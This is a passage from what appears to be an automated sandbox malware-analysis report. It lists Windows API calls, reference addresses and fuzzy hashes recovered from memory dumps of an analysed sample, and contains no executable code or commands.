                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: 3f7380b7a74b8731cba73f8408f1f10f805bfdfc95cfb47773048f703501431a
                                                • Instruction ID: 56e43f9cbda1cd79a2d0ef2445526f44815de6c67edf2303a5bf85bf61d30b14
                                                • Opcode Fuzzy Hash: 3f7380b7a74b8731cba73f8408f1f10f805bfdfc95cfb47773048f703501431a
                                                • Instruction Fuzzy Hash: 6641AE74B00609DFEB23DF58C884FA97BF5FB49300F1984A9E9949B295D731E841CB90
                                                APIs
                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FE0B27
                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00FE0B43
                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00FE0BA9
                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00FE0BFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 06b53111499c3791a8508cfd0605be0145e888834fc0d041f0c1e56cad785140
                                                • Instruction ID: d2cb46360a4622b2bd29391738271c9890c5827b3abc67ce9b8726310c59de0d
                                                • Opcode Fuzzy Hash: 06b53111499c3791a8508cfd0605be0145e888834fc0d041f0c1e56cad785140
                                                • Instruction Fuzzy Hash: 66313930D402886EFB318B278C05BFABBAABB85325F48435AE585D11D1CBF989C4B751
                                                APIs
                                                • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00FE0C66
                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FE0C82
                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00FE0CE1
                                                • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00FE0D33
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 011530dd7f70cefb8cb2a0fda1570a362452fb2e7976c117a5aba9f7f591ee48
                                                • Instruction ID: f7c7531b01a54c8f7057616562b6df59aef58452d77ca9daa41689dfd6ff68e6
                                                • Opcode Fuzzy Hash: 011530dd7f70cefb8cb2a0fda1570a362452fb2e7976c117a5aba9f7f591ee48
                                                • Instruction Fuzzy Hash: C2315C30E002985EFF318B6A8C04BFEBB66AB45330F14431BE481621D1CBB959C5B752
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FB61FB
                                                • __isleadbyte_l.LIBCMT ref: 00FB6229
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FB6257
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FB628D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: b451a6261360d9767652f5ced27078fc55d39601eb6e37077ef139e95ae4ab6b
                                                • Instruction ID: 6dc5f3c85aa2586121e78408ea8d7f03cb9733a19013288eac102afb05d3e661
                                                • Opcode Fuzzy Hash: b451a6261360d9767652f5ced27078fc55d39601eb6e37077ef139e95ae4ab6b
                                                • Instruction Fuzzy Hash: 9231C031A00246AFEF218F6ACC44BFA7BA9BF42360F154028F864D7191E739D951EF50
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 01004F02
                                                  • Part of subcall function 00FE3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FE365B
                                                  • Part of subcall function 00FE3641: GetCurrentThreadId.KERNEL32 ref: 00FE3662
                                                  • Part of subcall function 00FE3641: AttachThreadInput.USER32(00000000,?,00FE5005), ref: 00FE3669
                                                • GetCaretPos.USER32(?), ref: 01004F13
                                                • ClientToScreen.USER32(00000000,?), ref: 01004F4E
                                                • GetForegroundWindow.USER32 ref: 01004F54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: 70f631daa9713c35b428c2513c7062685a712c8e73484b007261ea11027fa41e
                                                • Instruction ID: 28cd3f4529705c1b602f32d1343cd1df40456523ae14be64b7c1159c53676562
                                                • Opcode Fuzzy Hash: 70f631daa9713c35b428c2513c7062685a712c8e73484b007261ea11027fa41e
                                                • Instruction Fuzzy Hash: 4A312B71D00109AFDB10EFB5CC859EFB7F9EF88304F14406AE555E7241DAB99E059BA0
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00FE3C7A
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00FE3C88
                                                • Process32NextW.KERNEL32(00000000,?), ref: 00FE3CA8
                                                • CloseHandle.KERNEL32(00000000), ref: 00FE3D52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: 9db9423973fb07592ef931d48dd983360246960aec36f7f634553e8dcfe72b5f
                                                • Instruction ID: 838ce2f1f075abbd8fd86423a49d55c86977b4d32400fef077fb369201717b57
                                                • Opcode Fuzzy Hash: 9db9423973fb07592ef931d48dd983360246960aec36f7f634553e8dcfe72b5f
                                                • Instruction Fuzzy Hash: D231AF711083459FC321EF11CC89AEFBBE8AF95310F50082CF481861A1EB75DA49DB92
                                                APIs
                                                  • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                • GetCursorPos.USER32(?), ref: 0100C4D2
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FBB9AB,?,?,?,?,?), ref: 0100C4E7
                                                • GetCursorPos.USER32(?), ref: 0100C534
                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FBB9AB,?,?,?), ref: 0100C56E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                • String ID:
                                                • API String ID: 2864067406-0
                                                • Opcode ID: 41ba5745f8e2a61339ffea00fadb8a694a151738fbbea19740f25b8a33b5c8fe
                                                • Instruction ID: 0f028b464af25821661618d34eaf7799305974318d76544d959d675c8d3ddaff
                                                • Opcode Fuzzy Hash: 41ba5745f8e2a61339ffea00fadb8a694a151738fbbea19740f25b8a33b5c8fe
                                                • Instruction Fuzzy Hash: 2431F739500418AFFB22CF58C894DEA7FF5FB09311F4441D9FA858B291CB365950DB90
                                                APIs
                                                  • Part of subcall function 00FD810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FD8121
                                                  • Part of subcall function 00FD810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FD812B
                                                  • Part of subcall function 00FD810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD813A
                                                  • Part of subcall function 00FD810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8141
                                                  • Part of subcall function 00FD810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8157
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FD86A3
                                                • _memcmp.LIBCMT ref: 00FD86C6
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FD86FC
                                                • HeapFree.KERNEL32(00000000), ref: 00FD8703
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                • String ID:
                                                • API String ID: 1592001646-0
                                                • Opcode ID: 0d0a5060b4532ae7505c38acc6354718d46ec6b29c36bf763ca1df693f91f047
                                                • Instruction ID: 766c133781cd1c582201b338e9ed8adee3c1ad4be357ce3d7276a01f6ceab50a
                                                • Opcode Fuzzy Hash: 0d0a5060b4532ae7505c38acc6354718d46ec6b29c36bf763ca1df693f91f047
                                                • Instruction Fuzzy Hash: 3B219C71E00209EFDB10DFA4C948BEEB7B9EF45364F19405AE444A7240EB35AE06EB50
                                                APIs
                                                • __setmode.LIBCMT ref: 00FA09AE
                                                  • Part of subcall function 00F85A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE7896,?,?,00000000), ref: 00F85A2C
                                                  • Part of subcall function 00F85A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE7896,?,?,00000000,?,?), ref: 00F85A50
                                                • _fprintf.LIBCMT ref: 00FA09E5
                                                • OutputDebugStringW.KERNEL32(?), ref: 00FD5DBB
                                                  • Part of subcall function 00FA4AAA: _flsall.LIBCMT ref: 00FA4AC3
                                                • __setmode.LIBCMT ref: 00FA0A1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                • String ID:
                                                • API String ID: 521402451-0
                                                • Opcode ID: 0fa1d09bf6a19e3a4ee4f5be86936d118c440eae96373c3ef547237d4ea12fa1
                                                • Instruction ID: 37e184a75ada7fe66a004571d03c5fa84aa2636125bb4d98e1dbef4987c073d5
                                                • Opcode Fuzzy Hash: 0fa1d09bf6a19e3a4ee4f5be86936d118c440eae96373c3ef547237d4ea12fa1
                                                • Instruction Fuzzy Hash: A1113DB29042056FDB04B7B4AC479FE77699F87320F64011AF10557282EFBD584677A1
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FF17A3
                                                  • Part of subcall function 00FF182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FF184C
                                                  • Part of subcall function 00FF182D: InternetCloseHandle.WININET(00000000), ref: 00FF18E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Internet$CloseConnectHandleOpen
                                                • String ID:
                                                • API String ID: 1463438336-0
                                                • Opcode ID: a00152de32c1a9df24ca91cc6ccb0a1a84630562dd6365b6055ea748182c745c
                                                • Instruction ID: 8d2412f98579847036cc59faeda90a2ce973aa5a71d0a50c325d14a72fb23d1d
                                                • Opcode Fuzzy Hash: a00152de32c1a9df24ca91cc6ccb0a1a84630562dd6365b6055ea748182c745c
                                                • Instruction Fuzzy Hash: 5521C232600609FFEB229F60CC00FBABBA9FF48750F14401AFB4596660DBB59811F7A1
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,0100FAC0), ref: 00FE3A64
                                                • GetLastError.KERNEL32 ref: 00FE3A73
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FE3A82
                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0100FAC0), ref: 00FE3ADF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                • String ID:
                                                • API String ID: 2267087916-0
                                                • Opcode ID: a1dc570bc4124a4c11bfd79cfd27d0250a52bdfddf8928c2a9fe2f9dc4de1fcf
                                                • Instruction ID: 93d18591196dd93b1f168c1d52b49be2eaa887912c42c6bcc8edf940c24260df
                                                • Opcode Fuzzy Hash: a1dc570bc4124a4c11bfd79cfd27d0250a52bdfddf8928c2a9fe2f9dc4de1fcf
                                                • Instruction Fuzzy Hash: DA21F6385082019FC310EF29C8898AA77E4AE45724F104A2DF4D9C7291D735DE85EB82
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EC), ref: 01005D80
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01005D9A
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01005DA8
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01005DB6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 11397e36dd680078e96b0d6f1c3db4910e2ebdb3635739fe05c1bcd89dad64e6
                                                • Instruction ID: 2f4beb931930a0629a5a5c5fde749530d431456ed6d2666cd65c54e1dbd2d2ff
                                                • Opcode Fuzzy Hash: 11397e36dd680078e96b0d6f1c3db4910e2ebdb3635739fe05c1bcd89dad64e6
                                                • Instruction Fuzzy Hash: FD11D331205501AFEB26BB24DC08FBE7799FF85320F08421AF956C72E2C769AD01DB95
                                                APIs
                                                  • Part of subcall function 00FDF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FDDCD3,?,?,?,00FDEAC6,00000000,000000EF,00000119,?,?), ref: 00FDF0CB
                                                  • Part of subcall function 00FDF0BC: lstrcpyW.KERNEL32(00000000,?,?,00FDDCD3,?,?,?,00FDEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FDF0F1
                                                  • Part of subcall function 00FDF0BC: lstrcmpiW.KERNEL32(00000000,?,00FDDCD3,?,?,?,00FDEAC6,00000000,000000EF,00000119,?,?), ref: 00FDF122
                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FDEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FDDCEC
                                                • lstrcpyW.KERNEL32(00000000,?,?,00FDEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FDDD12
                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00FDEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FDDD46
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen
                                                • String ID: cdecl
                                                • API String ID: 4031866154-3896280584
                                                • Opcode ID: bca6d16d70e76a2bdec3f7a2b6a92abe00e76470ec4fa716886bb6c13ce65be0
                                                • Instruction ID: bcd6e62f54f6efed224e729af351fbe66afd1c91b7fc52c61a93a92376f11535
                                                • Opcode Fuzzy Hash: bca6d16d70e76a2bdec3f7a2b6a92abe00e76470ec4fa716886bb6c13ce65be0
                                                • Instruction Fuzzy Hash: 8011BE3A200305ABCF25AF34D845D7A77AAFF46320B44802BF806CB390EB759840E7A0
                                                APIs
                                                • _free.LIBCMT ref: 00FB5101
                                                  • Part of subcall function 00FA571C: __FF_MSGBANNER.LIBCMT ref: 00FA5733
                                                  • Part of subcall function 00FA571C: __NMSG_WRITE.LIBCMT ref: 00FA573A
                                                  • Part of subcall function 00FA571C: RtlAllocateHeap.NTDLL(01900000,00000000,00000001,00000000,?,?,?,00FA0DD3,?), ref: 00FA575F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 5995fa22ae46c3058ca5d6dcd71afcae6c559ed728b16a3b813fec01293b3f8b
                                                • Instruction ID: badd8fbbeeff12ff541a1e298d27f42f929cdbfc7f951028e59fd70eb18db8ea
                                                • Opcode Fuzzy Hash: 5995fa22ae46c3058ca5d6dcd71afcae6c559ed728b16a3b813fec01293b3f8b
                                                • Instruction Fuzzy Hash: 961123B2904A12AFCF312F7ABC4579D3798AF05BF0F204529FA449A151DE3D8841BBA0
                                                APIs
                                                • _memset.LIBCMT ref: 00F844CF
                                                  • Part of subcall function 00F8407C: _memset.LIBCMT ref: 00F840FC
                                                  • Part of subcall function 00F8407C: _wcscpy.LIBCMT ref: 00F84150
                                                  • Part of subcall function 00F8407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F84160
                                                • KillTimer.USER32(?,00000001,?,?), ref: 00F84524
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F84533
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FBD4B9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
